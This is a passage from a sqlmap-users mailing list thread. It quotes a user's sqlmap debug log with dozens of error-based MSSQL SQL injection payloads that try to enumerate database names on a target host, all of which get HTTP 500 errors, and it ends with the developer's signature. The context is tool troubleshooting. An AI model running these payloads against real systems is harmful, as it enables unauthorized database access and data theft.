> [09:55:48] [PAYLOAD] 20111' AND
> 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT
> [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:48] [PAYLOAD] 20111' AND
> 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW
> [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:48] [PAYLOAD] 20111' AND
> 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO
> [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:49] [PAYLOAD] 20111' AND
> 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT
> [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:49] [PAYLOAD] 20111' AND
> 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB
> [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:49] [PAYLOAD] 20111' AND
> 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG
> [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:49] [PAYLOAD] 20111' AND
> 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN
> [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:50] [PAYLOAD] 20111' AND
> 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv
> [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:50] [PAYLOAD] 20111' AND
> 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn
> [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:50] [PAYLOAD] 20111' AND
> 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo
> [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:51] [PAYLOAD] 20111' AND
> 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD
> [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:52] [PAYLOAD] 20111' AND
> 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc
> [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:53] [PAYLOAD] 20111' AND
> 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ
> [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:53] [PAYLOAD] 20111' AND
> 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb
> [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:53] [PAYLOAD] 20111' AND
> 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt
> [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:54] [PAYLOAD] 20111' AND
> 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI
> [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:54] [PAYLOAD] 20111' AND
> 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ
> [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:54] [PAYLOAD] 20111' AND
> 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe
> [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:55] [PAYLOAD] 20111' AND
> 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT
> [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:55] [PAYLOAD] 20111' AND
> 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP
> [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:55] [PAYLOAD] 20111' AND
> 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB
> [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:56] [PAYLOAD] 20111' AND
> 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
> 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
> WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1
> ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
> AND 'COwJ'='COwJ
> [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:56] [PAYLOAD] 20111' AND
> 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk
> [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:57] [PAYLOAD] 20111' AND
> 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
> 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
> WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1
> ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
> AND 'STKX'='STKX
> [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:57] [PAYLOAD] 20111' AND
> 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp
> [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:57] [PAYLOAD] 20111' AND
> 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf
> [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:57] [PAYLOAD] 20111' AND
> 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx
> [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:58] [PAYLOAD] 20111' AND
> 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd
> [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:58] [PAYLOAD] 20111' AND
> 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT
> [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:56:00] [PAYLOAD] 20111' AND
> 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk
> [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:56:00] [PAYLOAD] 20111' AND
> 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER
> [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:56:01] [PAYLOAD] 20111' AND
> 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
> 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
> WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1
> ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
> AND 'MPbC'='MPbC
> [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:56:02] [DEBUG] performed 38 queries in 16 seconds
> available databases [37]:
>
> [09:56:02] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 62 times
> [09:56:02] [INFO] Fetched data logged to text files under
> '/path/sqlmap-dev/output/www.vuln.com'
>
> [*] shutting down at: 09:56:02
>
> David
>
> ------------------------------------------------------------------------------
> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE:
> Pinpoint memory and threading errors before they happen.
> Find and fix more than 250 security defects in the development cycle.
> Locate bottlenecks in serial and parallel code that limit performance.
> http://p.sf.net/sfu/intel-dev2devfeb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia